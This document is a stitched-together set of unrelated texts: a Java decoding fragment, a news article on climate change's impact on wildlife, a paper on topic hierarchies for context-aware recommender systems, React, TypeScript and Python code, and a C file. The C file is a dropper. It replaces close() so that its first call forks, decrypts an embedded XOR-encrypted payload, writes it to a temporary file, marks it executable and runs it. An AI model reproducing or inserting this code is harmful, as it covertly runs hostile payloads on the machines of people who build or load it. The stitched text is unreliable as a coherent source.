        int l = 0;
        //decode the data: write each value repeats[i] times
        for (int i = 0; i < n / 2; i++) {
            for (byte k = 0; k < repeats[i]; k++) {
                decode[l] = data2[i];
                l++;
            }
        }
        //return the decoded array
        return decode;
    }
}
Global warming is disrupting wildlife and the environment on every continent, according to an unprecedented study that reveals the extent to which climate change is already affecting the world's ecosystems. Scientists examined published reports dating back to 1970 and found that at least 90% of environmental damage and disruption around the world could be explained by rising temperatures driven by human activity. Big falls in Antarctic penguin populations, fewer fish in African lakes, shifts in American river flows and earlier flowering and bird migrations in Europe are all likely to be driven by global warming, the study found. The team of experts, including members of the UN's intergovernmental panel on climate change (IPCC) from America, Europe, Australia and China, is the first to formally link some of the most dramatic changes to the world's wildlife and habitats with human-induced climate change. In the study, which appears in the journal Nature, researchers analysed reports highlighting changes in populations or behaviour of 28,800 animal and plant species. They examined a further 829 reports that focused on different environmental effects, including surging rivers, retreating glaciers and shifting forests, across the seven continents. To work out how much - or if at all - global warming played a role, the scientists next checked historical records to see what impact natural variations in local climate, deforestation and changes in land use might have on the ecosystems and species that live there. In 90% of cases the shifts in wildlife behaviour and populations could only be explained by global warming, while 95% of environmental changes, such as melting permafrost, retreating glaciers and changes in river flows were consistent with rising temperatures. "When we look at all these impacts together, it is clear they are across continents and endemic. We're getting a sense that climate change is already changing the way the world works," said lead author Cynthia Rosenzweig, head of the climate impacts group at Nasa's Goddard Institute for Space Studies in New York. Most of the reports examined by the team were published between 1970 and 2004, during which time global average temperatures rose by around 0.6C. The latest report from the IPCC suggests the world is likely to warm between 2C and 6C by the end of the century. "When you look at a map of the world and see where these changes are already happening, and how many species and systems are already responding to climate change after only a 0.6C rise, it just heightens our concerns for the future," Rosenzweig said. "It's clear we have to adapt to climate change as well as try to mitigate it. It's real and it's happening now." A large number of the studies included in the team's analysis reveal stark changes in water availability as the world gets warmer. In many regions snow and ice melts earlier in the year, driving up spring water levels in rivers and lakes, with droughts following in the summer. Understanding shifts in water availability will have a big impact on water management and be critical to securing supplies, the scientists say. By collecting disparate reports on wildlife and ecosystems, it is possible to see how disruption to one part of the environment has knock-on effects elsewhere. In one study rising temperatures caused sea ice in Antarctica to vanish, prompting an 85% fall in the krill population. 
A separate study found that the population of Emperor penguins, which feed on krill in the same region, had also fallen by 50% during one warm winter. A loss of krill, also a dietary staple for whales and seals, was cited as a factor in recent accounts of cannibalism among polar bears in the Arctic. In 2006 Steven Amstrup, a world expert on polar bears at the US Geological Survey, investigated three cases of the animals preying on one another in the southern Beaufort Sea. A lack of their usual prey may have prompted the bears to turn on each other. Other reports show how the early arrival of spring in Europe has far-reaching effects down the food chain. The warmer weather causes trees to unfurl their leaves earlier, which causes a rise in leaf-eating grub numbers sooner in the year. Blue tits that feed on the grubs have largely adapted to the shift by raising their young two weeks earlier. "It was a real challenge to separate the influence of human-caused temperature increases from natural climate variations or other confounding factors, such as land-use changes or pollution," said David Karoly, a co-author based at Melbourne University in Australia.
Combining Privileged Information to Improve Context-Aware Recommender Systems

A recommender system is an information filtering technology which can be used to predict preference ratings of items (products, services, movies, etc.) and/or to output a ranking of items that are likely to be of interest to the user. Context-aware recommender systems (CARS) learn and predict the tastes and preferences of users by incorporating available contextual information in the recommendation process. One of the major challenges in context-aware recommender systems research is the lack of automatic methods to obtain contextual information for these systems. Considering this scenario, in this paper we propose to use contextual information from topic hierarchies of the items (web pages) to improve the performance of context-aware recommender systems. The topic hierarchies are constructed by an extension of the LUPI-based Incremental Hierarchical Clustering method that considers three types of information: the traditional bag-of-words (technical information), and the combination of named entities (privileged information I) with domain terms (privileged information II). We evaluated the contextual information in four context-aware recommender systems. Different weights were assigned to each type of information. The empirical results demonstrate that topic hierarchies combining the two kinds of privileged information can provide better recommendations.

I. INTRODUCTION

A recommender system is an information filtering technology which can be used to predict preference ratings of items (products, services, movies, etc.) and/or to output a ranking of items that are likely to be of interest to the user. This kind of system emerged in order to reduce the difficulty users face in choosing the product or service that best meets their needs. Many areas have been using recommender systems, notably web sites such as Amazon, Netflix and Last.fm. Recommender systems usually use web access logs, which represent the interaction activity between users and items. Traditional recommender systems consider only two entities, items and users, to build the recommendation model. However, the use of contextual information can improve the recommendation process in some cases. Researchers who have investigated the use of context found that the quality of recommendations increases when additional information, such as time, place, and so on, is used. The concept of context can assume different definitions. In this paper we consider that context is any information that can be used to characterize the situation of an entity. An example of an application in which considering contextual information can be important is movie recommendation. A user may prefer to watch a love story with his girlfriend on Saturday night and a comedy with his friends during the week, so an online video store can recommend the movie that best corresponds to the user's context. Despite the proven importance of contextual information in the recommendation process, there is still a lack of automatic methods to obtain such information. In a context-aware recommender system it is possible to consider the context of the user or the context of the item. In this work we focus on the context extracted for the items (in our case, web pages). Contextual information can be represented and structured in various ways. One way of organizing this information is using hierarchical structures; previous researchers have represented context as trees.
Given this possibility of hierarchical organization of context, we have been using topic hierarchies as a way to organize and extract context from the textual content of web pages. Most of the methods in the literature for building topic hierarchies represent the texts as a traditional bag-of-words, i.e., they consider the terms of the texts as an unordered set of words. In previous work, we constructed topic hierarchies of web pages using the traditional bag-of-words, and the extracted topics were used as the context of these pages in context-aware recommender systems. However, Marcacini and Rezende proposed a method, called LUPI-based Incremental Hierarchical Clustering (LIHC), to construct topic hierarchies that uses, besides the bag-of-words (technical information), also privileged information, which is a more valuable kind of information extracted from texts. In a later study, we constructed topic hierarchies of the web pages using the LIHC method, considering the bag-of-words as technical information and the named entities extracted from the web pages as privileged information, and we used the topics as the contextual information of the web pages in context-aware recommender systems. However, named entities are only one of various types of information that can be considered privileged information. The original LIHC method used only one type of privileged information to construct the topic hierarchies; in other words, it did not work with more than one kind of privileged information at the same time. In this paper we extend the LIHC method to work with two kinds of privileged information, i.e., to construct topic hierarchies using, besides the technical information, two other kinds of information (privileged information). So, we propose to use topic hierarchies constructed from three kinds of information: bag-of-words (technical information), named entities (privileged information I) and domain terms (privileged information II). The aim of this work is to combine this information and evaluate the impact of using the topics extracted from this combination as contextual information in context-aware recommender systems. This paper is structured as follows: in Section II, we report the related work. In Section III, we present our proposal. We evaluate our proposal in Section IV. Finally, in Section V, we present conclusions and future work.

II. RELATED WORK

There are three different ways to acquire contextual information: explicitly, implicitly, and by inference. Explicit acquisition methods collect contextual information through direct questions to the users. Implicit acquisition methods get contextual information directly from Web data or the environment. Inference methods obtain contextual information using data and text mining techniques. In this paper, we infer context from web pages using text mining techniques. In the following, some related works are presented. Li et al. proposed methods to extract contextual information from online reviews. They investigated available restaurant review data and four types of contextual information for a meal: the company (whether the meal involved multiple people), occasion (for which occasion the event took place), time (what time of the day) and location (in which city the event took place). They developed their algorithms using existing natural language processing tools such as the GATE tool. Hariri et al.
introduced a context-aware recommendation system that obtains contextual information by mining hotel reviews made by users, and combines it with the users' rating history to calculate a utility function over a set of items. They used a hotel review dataset from the Trip Advisor website. The methods proposed by Li et al. and Hariri et al. assume there is explicit contextual information in the reviews, and such information is obtained for each review by mapping it to labels. Therefore, they use supervised methods to learn the labels. The advantage of our proposal is that it exploits unsupervised methods to learn topic hierarchies; therefore, it does not need a mapping between reviews and labels. Aciar proposed a technique to detect sentences of reviews containing contextual information. She applied text mining tools to define sets of rules for identifying such sentences. In her work the sentences are classified into two categories: "Contextual" and "Preferences". The category "Contextual" groups sentences that present information on the context in which the review was written. The category "Preferences" groups sentences that present information about the features that consumers evaluated. Our work differs from Aciar's method since it is capable of using more text mining techniques, all of them unsupervised, to extract contextual information. Aciar uses supervised techniques and evaluates her method by means of a case study, i.e., she does not compare her method's results against other methods in the literature. Besides, she does not discuss the use of the extracted information in the recommendation process. Ho et al. proposed an approach to mine future spatiotemporal events from news articles, and thus provide information for location-aware recommendation systems. A future event consists of its geographic location, temporal pattern, sentiment variable, news title, key phrase, and news article URL. Besides that, their method is unsupervised and also extracts topics. The contextual information that Ho et al. extracted is related to time and location. The information on time is extracted from the timestamp of the article publication; to extract information on location, they also used named entity recognition. However, they did not evaluate the impact of the extracted contextual information on the recommender systems; the authors only presented results about the evaluation of the context extraction process. Bauman and Tuzhilin presented a method to find relevant contextual information in users' reviews. In this method, the reviews are classified as "specific" and "generic". They found that contextual information is contained mainly in the specific reviews, which are those that describe specific visits of a user to an establishment. Therefore, the context is extracted from the "specific" reviews by means of two methods: "word-based" and "LDA-based". Bauman and Tuzhilin consider that the contextual information is not known a priori. Besides that, their method is unsupervised and also extracts topics. Our method differs from theirs since it also extracts topics using privileged information, which enriches the contextual information. Our method has many advantages over the other ones proposed in the literature. In general, it does not need previous information (for example, labels). It uses unsupervised methods and combines technical information with privileged information, which enriches the contextual information.
Additionally, the context extracted is about the item (web pages) and not the user. Finally, our results, presented in Section IV, demonstrate that our contextual information is able to improve the quality of recommendations.

III. OUR PROPOSAL

As already stated, the term context can assume many definitions depending on the area in which it is treated. We adopt the definition given by Dey: "Context is any information that can be used to characterize the situation of an entity". In our work the entities are web pages (items). Beyond the definition, contextual information can be represented using many structures. Some researchers treat context as a hierarchical structure and represent it using trees. For example, Panniello and Gorgoglione represent the attribute "period of year" as a tree, as illustrated in Figure 1. The idea of this research is to represent contextual information using a hierarchical structure called a topic hierarchy. Topic hierarchies organize texts into groups and subgroups, and for each group, topics are extracted to represent the main subject of the group. Constructing a topic hierarchy of the items in a recommender system means grouping them by context, i.e., the topics extracted for each group represent the context of the group; items of the same group are in the same context. We construct topic hierarchies using the textual content of the web pages, and use the topics as contextual information in context-aware recommender systems. Topic hierarchies can be constructed using hierarchical clustering. Traditional methods represent the textual collection as a bag-of-words, also known as technical information. However, we can extract concepts from the texts that are not represented in a simple bag-of-words. Named entities and domain terms are good examples of concepts that may consist of one word or more than one word and that are identified and extracted using more advanced text preprocessing techniques. Thus, these two kinds of information, named entities and domain terms, are considered in this paper as privileged information. The term Named Entity was born in the Message Understanding Conferences (MUC) and includes names of people, organizations and locations, besides numeric expressions like time, date, money and percent expressions. Named entity recognition is a task that involves identifying words or expressions that belong to categories of named entities. For example, in the sentence "Ana Maria works at Petrobras, in Brazil, since 1989", "Ana Maria" is recognized as a person, "Petrobras" as an organization, "Brazil" as a location and "1989" as a date. Despite the importance of the term extraction task, there is still no consensus on the formal definition of what a "term" is. A widely accepted definition of term is given by Cabré and Vivaldi: a "terminological unit obtained from a specialized domain". In most research found in the literature, the authors state that terms are generally nominal units, since they describe concepts. For example, in the Ecology domain, the terms "climate", "plant", "Atlantic forest" and "soil moisture" are examples of domain terms. Terms are used in applications such as information retrieval, information extraction and summarization.
In our proposal, we instantiate the LUPI-based Incremental Hierarchical Clustering (LIHC) method to construct topic hierarchies using one type of privileged information together with technical information. Let D_p = {d_1^p, ..., d_m^p} and D_t = {d_1^t, ..., d_n^t} be the sets of documents represented by the privileged information (totaling m documents) and by the technical information (totaling n documents), respectively. Note that the number of documents represented by the privileged information is, in general, smaller than the number of documents represented by technical information, i.e., m ≤ n. This is due to the fact that a significant number of documents do not contain features extracted from privileged information (e.g., named entities and domain terms). The subset Y of documents that contain both the privileged information and the technical information is used for learning the initial clustering model. In this case, various clustering algorithms are run (or the same algorithm is run repeatedly with different parameter values) to obtain several clusterings from the subset Y. To aggregate the generated clusters, the LIHC method obtains two co-association matrices, M_t(i, j) and M_p(i, j), which represent, respectively, the technical information (bag-of-words) clustering model and the privileged information clustering model. The combination of these two clustering models is performed by using a consensual co-association matrix:

M_F(i, j) = (1 − α) · M_t(i, j) + α · M_p(i, j)

for all items i and j. In this case, the parameter α is a combination factor (0 ≤ α ≤ 1) that indicates the importance of the privileged information space in the final co-association matrix. The initial model of the LIHC method is obtained by applying any hierarchical clustering algorithm to the matrix M_F. The remaining text documents, i.e., the documents without privileged information, are inserted incrementally into the hierarchical clustering using the nearest neighbor technique. For the construction of topic hierarchies, topic extraction is based on the selection of the most frequent terms of each cluster. In previous work, we constructed topic hierarchies of the web pages using the LIHC method and considering only named entities as privileged information. In this paper, we construct topic hierarchies by combining named entities and domain terms as privileged information, varying the weight of each type of information. To incorporate the two types of privileged information, the LIHC method was extended as follows. First, the privileged set D_p is divided into two sets, D_ne (for privileged information I, named entities) and D_dt (for privileged information II, domain terms). Let D_ne = {d_1^ne, ..., d_r^ne} be the set of documents with named entities (totaling r documents) and D_dt = {d_1^dt, ..., d_s^dt} be the set of documents with domain terms (totaling s documents). Similarly, the matrix M_p(i, j) is divided into two matrices, M_ne (the named entities clustering model) and M_dt (the domain terms clustering model). The combination of the three clustering models (M_t, M_ne and M_dt) is performed by using the following consensual co-association matrix:

M_F(i, j) = (1 − α) · M_t(i, j) + β · M_ne(i, j) + γ · M_dt(i, j)

where β and γ indicate the importance of the named entities and domain terms, respectively, in the final co-association matrix, and β + γ = α. In the next section, we empirically evaluate our proposal by using different values of α, β and γ to construct the topic hierarchies; a minimal sketch of the matrix combination is given below.
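The following Python sketch, under our own naming, illustrates how the consensual co-association matrix can be assembled from the three clustering models; it is not the authors' implementation, and the 3-document matrices are small hypothetical examples.

import numpy as np

def consensual_coassociation(M_t, M_ne, M_dt, alpha, beta, gamma):
    """Combine technical and privileged co-association matrices.

    M_t, M_ne, M_dt: co-association matrices (entries in [0, 1]) built from
    the bag-of-words, named-entity, and domain-term clustering models.
    alpha is the total weight of the privileged space; beta + gamma == alpha.
    """
    assert abs((beta + gamma) - alpha) < 1e-9, "beta + gamma must equal alpha"
    return (1 - alpha) * M_t + beta * M_ne + gamma * M_dt

# Hypothetical 3-document example: each entry is the fraction of clusterings
# in which documents i and j were assigned to the same cluster.
M_t  = np.array([[1.0, 0.6, 0.1], [0.6, 1.0, 0.2], [0.1, 0.2, 1.0]])
M_ne = np.array([[1.0, 0.8, 0.0], [0.8, 1.0, 0.3], [0.0, 0.3, 1.0]])
M_dt = np.array([[1.0, 0.5, 0.2], [0.5, 1.0, 0.1], [0.2, 0.1, 1.0]])

# One illustrative weighting: alpha = 0.5, split equally between
# the two kinds of privileged information.
M_F = consensual_coassociation(M_t, M_ne, M_dt, alpha=0.5, beta=0.25, gamma=0.25)
print(M_F)

# A hierarchical clustering can then be run on the distance matrix 1 - M_F,
# e.g. with scipy.cluster.hierarchy.linkage on its condensed form.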
IV. EMPIRICAL EVALUATION

The aim of our work is to study the impact of the context extracted by our method on context-aware recommender systems. Thus, the empirical evaluation consists of comparing the results of the algorithms C. Reduction, DaVI-BEST, Weight PoF and Filter PoF, all of them using our contextual information, against the un-contextual algorithm Item-Based Collaborative Filtering (IBCF). In this way, we compared the quality of the recommendations generated using our context against the quality of the recommendations generated without using contextual information. In this section, we present the details necessary to understand our experiments: data set, baseline, context-aware recommender algorithms, experimental setup, evaluation measure and the results.

A. Data Set

In the experiments we used a data set from a Portuguese website about agribusiness that consists of 4,659 users, 15,037 accesses and 1,543 web pages written in the Portuguese language. To construct the topic hierarchies for these web pages, we used the textual content of the pages, eliminating the header, footer and everything else not pertaining to the main textual content. We preprocessed the texts by executing traditional text preprocessing tasks: stopword removal and stemming. The representations, or "term value matrices", were constructed using the TF-IDF (term frequency-inverse document frequency) term weighting measure. Three representations were constructed: the traditional bag-of-words representation (technical information), the named entities representation (privileged information I) and the domain terms representation (privileged information II). We defined the weights by testing different combinations of the two kinds of privileged information; the weights are shown in Table I. We extracted the topics from the topic hierarchies considering three configurations: {50, 100}, {15, 20} and {2, 7}. In a configuration {x, y}, which represents the granularity level, the parameter x identifies the minimum number of items allowed in a topic, while the parameter y identifies the maximum number of items per topic. Topics with more items associated to them are more generic, while topics with fewer items are more specific. So, the topics extracted with the configuration {50, 100} are more generic and the topics extracted with the configuration {2, 7} are more specific. The configuration {15, 20} lies between the other two, and it was chosen because, in previous experiments, we obtained good results using this granularity level. Besides that, the more generic configuration extracts a smaller number of topics, while the more specific configuration extracts a larger number of topics. Therefore, using these configurations we can analyze whether the number of topics extracted, or their granularity level, influences the quality of the recommendations. In Table II, we show the number of topics extracted using each configuration.

B. Supporting Tools and Methods

In the experiments we used JPretext and LIHC for the preprocessing and the hierarchical clustering of the items. These two tools are part of Torch, a set of tools developed to support text clustering and the construction of topic hierarchies. JPretext transforms the collection of texts into a "term value matrix", and the LIHC tool implements the LUPI-based Incremental Hierarchical Clustering method. The named entity recognition was performed using REMBRANDT, a system that recognizes classes of named entities, like things, locations, organizations, people and others, in texts written in Portuguese. REMBRANDT uses Wikipedia as the knowledge base for the classification of the entities.
C. Baseline

In this paper we considered the un-contextual algorithm Item-Based Collaborative Filtering (IBCF) as the baseline. Let m be the number of users U = {u_1, u_2, ..., u_m} and n the number of items that can be recommended I = {i_1, i_2, ..., i_n}. An item-based collaborative filtering model M is a matrix representing the similarities among all pairs of items, according to a similarity measure. We used the cosine-angle similarity measure, defined as

sim(i_1, i_2) = (i⃗_1 · i⃗_2) / (||i⃗_1|| ||i⃗_2||),

where i⃗_1 and i⃗_2 are rating vectors and the operator "·" denotes the dot product of the two vectors. In our case, as we are dealing only with implicit feedback, the rating vectors are binary: the value 1 means that the user accessed the respective item, whereas the value 0 means the opposite. Given an active user u_a and his set of observable items O ⊆ I, the N recommendations are generated as follows. First, we identify the set of candidate items for recommendation R by selecting from the model all items i ∉ O. Then, for each candidate item r ∈ R, we calculate its recommendation score as

score(u_a, r) = Σ_{i ∈ K_r ∩ O} sim(i, r),

where K_r is the set of the k most similar items to the candidate item r. The N candidate items with the highest score values are recommended to the user u_a. All the context-aware recommendation algorithms used in this work are based on Item-Based Collaborative Filtering; they are presented next, after a short sketch of the baseline.
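The item-based model and scoring step described above can be sketched as follows for binary (implicit) feedback; the user-item matrix is a toy example and the neighborhood size k is kept small for readability. This is an illustrative reimplementation, not the code used in the experiments.

import numpy as np

def cosine_sim(R):
    """Item-item cosine similarities from a binary user-by-item matrix R."""
    norms = np.linalg.norm(R, axis=0)
    norms[norms == 0] = 1.0
    return (R.T @ R) / np.outer(norms, norms)

def recommend(R, user, k=4, N=5):
    S = cosine_sim(R)
    observed = np.flatnonzero(R[user])
    candidates = np.flatnonzero(R[user] == 0)
    scores = {}
    for r in candidates:
        # k most similar items to candidate r (excluding r itself)
        neighbors = [i for i in np.argsort(S[r])[::-1] if i != r][:k]
        scores[r] = sum(S[r, i] for i in neighbors if i in observed)
    return sorted(scores, key=scores.get, reverse=True)[:N]

R = np.array([[1, 1, 0, 0, 1],
              [1, 0, 1, 0, 0],
              [0, 1, 1, 1, 0]])
print(recommend(R, user=0))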
D. Context-Aware Recommender Systems

Context-aware recommender systems (CARS) learn and predict the tastes and preferences of users by incorporating available contextual information into the recommendation process. According to Adomavicius and Tuzhilin, contextual information can be applied at various stages of the recommendation process. Following this criterion, these systems can be divided into three categories: contextual pre-filtering, contextual modeling and contextual post-filtering. In this work, we evaluate the effects of using the contextual information obtained from topic hierarchies in four different context-aware recommender systems. C. Reduction (pre-filtering approach): in pre-filtering approaches the contextual information is used as a label for filtering out those data that do not correspond to the specified contextual information. The remaining data that passed the filter (contextualized data) are used to generate the model. C. Reduction uses the contextual information as a label to segment the data. A recommendation method is run for each contextual segment to determine which segment outperforms the traditional un-contextual recommendation model. The best contextual model is chosen to make the recommendations; here, the best model is the one with the highest F1 measure. DaVI-BEST (contextual modeling approach): in this approach the context is used in the recommendation model, i.e., the contextual information is part of the model together with user and item data. DaVI-BEST considers the contextual information as virtual items, using them along with the actual items in the recommendation model. All contextual dimensions are evaluated, and the dimension that best outperforms the traditional un-contextual recommendation model is selected to make contextual recommendations. Weight PoF and Filter PoF (contextual post-filtering approaches): these approaches use the contextual information to reorder and to filter the recommendations, respectively. First, they apply the traditional algorithm to build the un-contextual recommendation model, ignoring the contextual information. Then, the probability of each user accessing each item given the current context is calculated. This probability is multiplied by the scores of the items to reorder the recommendations (Weight PoF) or is used as a threshold to filter them (Filter PoF).

E. Experimental Setup and Evaluation Measures

The protocol considered in this paper to measure the predictive ability of the recommender systems is the All But One protocol with 10-fold cross-validation, i.e., the set of documents is partitioned into 10 subsets; for each fold we use nine of these subsets for training and the remaining one for testing. The training set T_r is used to build the recommendation model. For each user in the test set T_e, an item is hidden as a singleton set H. The remaining items represent the set of observable items O, which is used in the recommendation. Then, we compute the Mean Average Precision (MAP@N), where N equals 5 and 10 recommendations (a short sketch of this computation follows). For each configuration and measure, the 10-fold values are summarized by their mean and standard deviation. To compare two recommendation algorithms, we applied the two-sided paired t-test with a 95% confidence level. In our empirical evaluation, we used the 4 most similar items to make the recommendations and 0.1 as the threshold in Filter PoF to filter out the recommendations, since these values provided the best results for this experiment.
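Under the All But One protocol each test user has exactly one hidden item, so a user's average precision reduces to the reciprocal of the hidden item's rank when it appears among the top N (and 0 otherwise). A minimal sketch of MAP@N under this protocol, with invented recommendation lists:

def map_at_n(recommendations, hidden, N=10):
    """recommendations: {user: ranked list of item ids}
    hidden: {user: the single held-out item}"""
    ap_values = []
    for user, ranked in recommendations.items():
        top = ranked[:N]
        ap = 1.0 / (top.index(hidden[user]) + 1) if hidden[user] in top else 0.0
        ap_values.append(ap)
    return sum(ap_values) / len(ap_values)

recs = {"u1": ["i3", "i7", "i1"], "u2": ["i2", "i9", "i4"]}
hidden = {"u1": "i7", "u2": "i5"}
print(map_at_n(recs, hidden, N=10))  # (1/2 + 0) / 2 = 0.25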
F. Results

In Table III, we show the results of our ranking evaluation by means of MAP@N. The results are obtained at four values of the combination factor (λ = 0.3, λ = 0.5, λ = 0.7 and λ = 1) and at three granularity levels, as described in Section IV-A. For each value of the combination factor we also report the weights of each type of privileged information. To facilitate the understanding of the results, we denote the weight of the technical information as BOW, the weight of the named entities as NE and the weight of the domain terms as DT. The presented results are for the three context-aware recommendation algorithms (C. Reduction, Weight PoF and Filter PoF), and also for the baseline IBCF. The DaVI-BEST results are not presented because they are equivalent to the IBCF results; there is thus no improvement from using this algorithm with the contextual information extracted by our proposal. The analysis of the results can be divided into three questions: 1) Which algorithm gives the best results? 2) Which granularity gives the best results? 3) Which value of the combination factor gives the best results? Answering the first question, we observe that the algorithm Weight PoF presented the best results. This algorithm was also better than the baseline, with statistical significance, in all the experiments. For the second question, each algorithm was better at a different granularity level. The C. Reduction and Weight PoF algorithms presented their best results at configuration {15, 20}, while the Filter PoF algorithm presented its best results at configuration {2, 7} (more specific topics). The topics extracted with the configuration {50, 100} presented MAP values not as high as those of the other configurations, which shows that it is better to consider more specific topics, and in larger amounts. In the graph of Figure 2, we can analyze the best results of our experiments, i.e., the results for λ = 0.3 (BOW = 70%, NE = 10% and DT = 20%). The x-axis represents the granularity levels while the y-axis represents the values of MAP@10. Each line of the graph is a recommender algorithm. It is evident that the three context-aware algorithms presented better results than the baseline IBCF; only Filter PoF presented a lower value of MAP at the granularity {50, 100}. At the granularity {2, 7}, this same algorithm presented better results than the other algorithms, which shows that it attains high MAP values when more specific topics are used. The algorithms Weight PoF and Filter PoF presented their best MAP values at the granularity {15, 20}, with Weight PoF the better of the two.

V. CONCLUSION

In this paper, we proposed to use contextual information from topic hierarchies, constructed by the LIHC method, to improve the accuracy of context-aware recommender systems. The topic hierarchies were constructed considering the traditional bag-of-words (technical information) and the combination of named entities (privileged information I) and domain terms (privileged information II). The empirical evaluation showed that, by using topics from the topic hierarchies with combined privileged information as contextual information, context-aware recommender systems can provide better recommendations. The contextual information obtained from the three topic hierarchies improved the recommendations in 3 out of the 4 recommender systems evaluated in this paper: C. Reduction, Weight PoF and Filter PoF (in most of the experiments). As future work, we will finish experiments in which we compare the combined use of the two types of privileged information against the results of our previous studies using named entities and domain terms separately. Additionally, we will also compare our proposal against other baselines proposed in the literature.
import React from "react";
import { Container, Button, Typography, makeStyles } from "@material-ui/core";
import { Link } from "react-router-dom";

const useStyles = makeStyles({
  container: {
    display: "flex",
    flexDirection: "column",
    justifyContent: "center",
    textAlign: "center",
    flexWrap: "wrap",
    marginTop: "60px",
  },
});

export const NoCredits = () => {
  const classes = useStyles();

  return (
    <Container className={classes.container}>
      <Typography style={{ color: "white", marginBottom: 20 }} variant="h3">
        Saldo Insuficiente
      </Typography>
      <Link style={{ textDecoration: "none" }} to={`/payment`}>
        <Button variant="contained" color="secondary">
          <span style={{ color: "white" }}>Comprar Créditos</span>
        </Button>
      </Link>
    </Container>
  );
};
#include <stdio.h>
#include <stdlib.h>     /* added: exit() */
#include <unistd.h>     /* added: fork(), execve() */
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>

#define __NR_close 6

/* X1 is an encrypted payload embedded elsewhere; KEY is expected to be
   supplied at compile time (e.g. -DKEY="..."), as neither is defined in
   this file. */
extern char X1[];
extern int X1LEN;

int cclose(int);
int Vcrypt(char *, char *, int);
int dump_it(FILE *, char *, char *, int);

/***8***/
/* Replacement for close(2): on its first invocation it decrypts the
   embedded payload, dumps it to a temporary file, makes the file
   executable and runs it; every later call falls through to the real
   system call. */
int close(int fd)
{
    static int first = 0;
    int i = 0;
    FILE *o1, *o2, *o3, *o4, *o5, *o7;
    int retval;
    char *argv[3] = {0};

    argv[0] = tmpnam(NULL);
    if (first == 1) {
        return cclose(fd);
    }
    first = 1;
    retval = cclose(fd);

/***5***/
#ifndef DEBUG
    /* Detach: the parent returns normally, the child runs the payload. */
    if (fork() > 0) {
        return retval;
    }
#endif
    if ((o1 = fopen(argv[0], "w+")) == NULL) {
/***3***/
#ifdef DEBUG
        perror("fopen");
#endif
        exit(errno);
    }
    Vcrypt(X1, KEY, X1LEN);
    dump_it(o1, X1, NULL, X1LEN);
    fclose(o1);
    chmod(argv[0], 0100 | 0200 | 0400);
    execve(argv[0], argv, NULL);  /* does not return on success */
/***end***/
}

/***3***/
/* Direct syscall wrapper around the real close(2). */
int cclose(int fd)
{
    long __res;
    errno = 0;
/***3***/
    __asm__ volatile ("int $0x80"
                      : "=a" (__res)
                      : "0" (__NR_close), "b" ((long)(fd)));
    if (__res >= 0) {
        return (int)__res;
    }
    errno = -__res;
    return -1;
/***end***/
}

/***4***/
/* We expect key as char[30]: simple repeating-key XOR. */
int Vcrypt(char *s, char *key, int s_len)
{
    int i = 0, j = 0;
    for (; i < s_len; i++) {
        s[i] ^= key[j++ % 30];
    }
    return 0;
/***end***/
}

/***3***/
/* Write the buffer either verbatim (cnam == NULL) or as a C array
   definition named cnam. */
int dump_it(FILE *fd, char *s, char *cnam, int s_len)
{
    int i = 0, j = 1, count = 0;
    if (cnam) {
        fprintf(fd, "char %s[] =\n\"", cnam);
    }
    for (; i < s_len; i++) {
        count++;
        if (cnam) {
            fprintf(fd, "\\x%02x", (unsigned char)s[i]);
        } else {
            fprintf(fd, "%c", s[i]);
        }
        if (!(j % 15) && cnam) {
            fprintf(fd, "\"\n\"");
            j = 0;
        }
        j++;
    }
    if (j != 1 && cnam) {
        fprintf(fd, "\"");
    }
    if (cnam) {
        fprintf(fd, ";");
        fprintf(fd, "int %sLEN = %d;\n", cnam, count);
    }
    return 0;
/***end***/
}
import { Project } from '../project';
import { Manifest, Target } from '../manifest';
import {
  targetImportFailed,
  targetIsOpen,
  targetCreateFailed,
  targetRestoreFailed,
  targetNotFound
} from '../errors';
import { importGraph, createDocument } from '../addin';
import { loadFromProject, stageBuildGraph } from '../build';
import { join } from '../utils/path';
import { pathExists, ensureDir, remove, move, emptyDir, copy } from '../utils/fs';
import { zip } from '../utils/zip';

export interface BuildOptions {
  target?: string;
  addin?: string;
}

export interface ProjectInfo {
  project: Project;
  dependencies: Manifest[];
}

/**
 * Build target:
 *
 * 1. Create fresh target in staging
 * 2. Import project
 * 3. Backup previously built target
 * 4. Move built target to build
 */
export default async function buildTarget(
  target: Target,
  info: ProjectInfo,
  options: BuildOptions = {}
) {
  const { project } = info;

  // Build fresh target in staging directory
  // (for no target path, create blank target)
  const staged = !target.blank
    ? await createTarget(project, target)
    : await createDocument(project, target, { staging: true });

  await importTarget(target, info, staged, options);

  // Backup and move from staging to build directory
  try {
    await backupTarget(project, target);

    const dest = join(project.paths.build, target.filename);
    await move(staged, dest);
  } catch (err) {
    await restoreTarget(project, target);
    throw err;
  } finally {
    await remove(staged);
  }
}

/**
 * Create target binary
 */
export async function createTarget(project: Project, target: Target): Promise<string> {
  if (!(await pathExists(target.path))) {
    throw targetNotFound(target);
  }

  const file = join(project.paths.staging, target.filename);

  try {
    await ensureDir(project.paths.staging);
    await zip(target.path!, file);
  } catch (err) {
    throw targetCreateFailed(target, err);
  }

  return file;
}

/**
 * Import project into target
 *
 * 1. Create "import" staging directory
 * 2. Load build graph for project
 * 3. Stage build graph
 * 4. Import staged build graph
 */
export async function importTarget(
  target: Target,
  info: ProjectInfo,
  file: string,
  options: BuildOptions = {}
) {
  const { project, dependencies } = info;

  const staging = join(project.paths.staging, 'import');
  await ensureDir(staging);
  await emptyDir(staging);

  const build_graph = await loadFromProject(project, dependencies);
  const import_graph = await stageBuildGraph(build_graph, staging);

  try {
    await importGraph(project, target, import_graph, file, options);
  } catch (err) {
    throw targetImportFailed(target, err);
  } finally {
    await remove(staging);
  }
}

/**
 * Backup previously built target (if available)
 *
 * - Removes previous backup (if found)
 * - Attempts move, if that fails, it is assumed that the file is open
 */
export async function backupTarget(project: Project, target: Target) {
  const backup = join(project.paths.backup, target.filename);
  const file = join(project.paths.build, target.filename);

  if (await pathExists(backup)) await remove(backup);

  if (await pathExists(file)) {
    await ensureDir(project.paths.backup);

    try {
      await move(file, backup);
    } catch (err) {
      throw targetIsOpen(target, file);
    }
  }
}

/**
 * Restore previously built target (if available)
 */
export async function restoreTarget(project: Project, target: Target) {
  const backup = join(project.paths.backup, target.filename);
  const file = join(project.paths.build, target.filename);

  if (!(await pathExists(backup))) return;

  try {
    await copy(backup, file);
  } catch (err) {
    throw targetRestoreFailed(backup, file, err);
  }
}
from cowdict import CowDict


def test_repr_and_str():
    base = {"key1": "value1", "key2": "value2"}
    cd = CowDict(base)
    cd["new_key"] = "new_value"
    del cd["key2"]

    # Key ordering is not guaranteed, so both orders are accepted.
